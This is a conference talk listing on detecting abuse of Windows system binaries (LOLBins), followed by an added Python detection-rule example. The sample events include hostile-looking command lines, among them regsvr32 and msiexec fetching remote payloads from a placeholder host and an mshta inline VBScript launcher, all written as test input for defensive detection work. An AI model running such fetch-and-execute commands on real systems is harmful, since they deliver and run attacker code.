2023-10-07, Track 2
Are you struggling to keep up with false positive alerts? Worried that the alerts you ingest will never catch true evil? Are you responding to malicious activity well after it occurs, rather than detecting it in real time? If you answered “yes” to any of the above, this talk is for you. Attendees will leave with a repeatable process for detecting malicious activity in their environment more effectively.
Focusing on system binaries that frequently facilitate the download or execution of malicious code (rundll32.exe, msiexec.exe, regsvr32.exe, etc.), we’ll use publicly available resources to establish what normal behavior looks like and how it differs from malicious behavior. We’ll walk through how to answer questions such as: what are the normal command-line parameters, process paths, and process lineages for this binary? Should it be making network connections? What are its known abuse techniques?
We’ll then dive into a handful of options for turning those findings into effective detection logic. Using examples of real-world threats and of techniques often used by red teams (e.g., search order hijacking, process injection, privilege escalation), these detection ideas will help defenders create alerts that carry more meaning and have a higher true positive rate.
- Intro: What are LOLBins?
  - Commonly used system binaries that download or execute malicious code
    - rundll32, regsvr32, msiexec, mshta, msbuild
- Gather information
  - What is normal? Process path, network connections, typical command line, process lineage
  - How can this binary be abused?
  - Use the findings to explore detection options
- Detect the evil
  - What real threats should this be catching? Example activity from threats such as:
    - Qbot
    - Raspberry Robin
    - SocGholish
  - Potential to also catch widespread tactics used by many threats and red teams: search order hijacking, process injection, privilege escalation
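The outline above describes a two-step process: record what is normal for each binary (path, network behavior, command line, lineage), then write rules that fire on deviations from that baseline and on known abuse patterns. The following is an added example, written for this page rather than taken from the talk or from Red Canary, that implements that process over a handful of constructed process events. The baseline values (expected directories, whether outbound connections are expected), the rule names, the `ProcessEvent` fields and the sample events are all assumptions chosen for illustration; the `example.invalid` URLs are placeholders, and a real deployment would derive the baseline from its own telemetry.

```python
"""Baseline-then-detect for a few LOLBins, run over constructed process events.

Added example, not code from the talk. Baseline values and sample events are
assumptions for illustration; tune them against your own environment's telemetry.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str                 # full path of the process image
    command_line: str          # as recorded by the sensor
    parent_image: str          # full path of the parent process image
    network_connection: bool = False   # did the process make an outbound connection?


# "What is normal?" per binary (assumed): where it should live and whether
# outbound network connections are expected. msiexec is marked as not expected
# to reach out; relax that if your environment installs packages from URLs.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
BASELINE = {
    "rundll32.exe": {"dirs": SYSTEM_DIRS, "network": False},
    "regsvr32.exe": {"dirs": SYSTEM_DIRS, "network": False},
    "mshta.exe":    {"dirs": SYSTEM_DIRS, "network": False},
    "msiexec.exe":  {"dirs": SYSTEM_DIRS, "network": False},
}

# Directories an unprivileged user can write to; a DLL loaded from here, or a
# parent launched from here, is far more interesting than one under System32.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads)|users\\public|programdata|windows\\temp)\\", re.I)

# Parents that rarely have a legitimate reason to spawn these binaries.
OFFICE_AND_SCRIPT_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                           "outlook.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.I)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def dirname(path: str) -> str:
    return ntpath.dirname(path).lower()


def evaluate(ev: ProcessEvent) -> list:
    """Return the names of every rule the event triggers, in rule order."""
    name = basename(ev.image)
    base = BASELINE.get(name)
    if base is None:
        return []          # not one of the binaries we baselined
    cmd = ev.command_line.lower()
    hits = []
    # Deviations from the baseline gathered in step one.
    if dirname(ev.image) not in base["dirs"]:
        hits.append("unexpected_path")
    if ev.network_connection and not base["network"]:
        hits.append("unexpected_network")
    if basename(ev.parent_image) in OFFICE_AND_SCRIPT_HOSTS:
        hits.append("suspicious_parent")
    if USER_WRITABLE.search(ev.parent_image):
        hits.append("parent_in_user_writable")
    # Known abuse patterns for each binary.
    if name == "rundll32.exe" and len(cmd.split()) <= 1:
        hits.append("rundll32_no_arguments")      # common injection target
    if name in ("rundll32.exe", "regsvr32.exe") and USER_WRITABLE.search(cmd):
        hits.append("dll_in_user_writable")       # dropped or hijacked DLL
    if name == "regsvr32.exe" and "scrobj.dll" in cmd and REMOTE_URL.search(cmd):
        hits.append("remote_scriptlet")           # regsvr32 /i:http... scrobj.dll
    if name in ("rundll32.exe", "mshta.exe") and re.search(r"\b(javascript|vbscript):", cmd):
        hits.append("inline_script")
    if name == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("remote_hta")
    if name == "msiexec.exe" and REMOTE_URL.search(cmd) and re.search(r"(^|\s)[/-](i|package)\b", cmd):
        hits.append("remote_msi")
    return hits


def run_detections(events) -> dict:
    """Map event index -> triggered rules, for events that fired at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


# Constructed sample events (not real telemetry). Index 0 is benign; the rest
# each exercise one or more rules.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", True),
    ProcessEvent(r"C:\Windows\SysWOW64\rundll32.exe", "rundll32.exe",
                 r"C:\Users\bob\AppData\Local\Temp\update.exe", True),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /q /i http://example.invalid/pkg.msi",
                 r"C:\Windows\System32\cmd.exe", True),
    ProcessEvent(r"C:\Users\bob\Downloads\mshta.exe",
                 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"":close")',
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\bob\AppData\Roaming\Microsoft\upd.dll,Start",
                 r"C:\Windows\explorer.exe", True),
]

if __name__ == "__main__":
    for i, hits in run_detections(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i].image), hits)
```

The baseline rules (`unexpected_path`, `unexpected_network`, `suspicious_parent`) are broad on their own; the abuse-pattern rules are narrow. Alerting on an abuse pattern, or on two or more baseline deviations together, rather than on any single deviation, is what pushes the true positive rate up while still catching the classes of activity listed above.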
With a background primarily in blue team operations, Rachel spent several years working as a Cybersecurity Analyst on an Incident Response team. During this time, she became fascinated with digital forensics and threat detection. She is now on the Detection Engineering team at Red Canary, where she spends her time hunting for evil across customer environments and developing new methods of detection.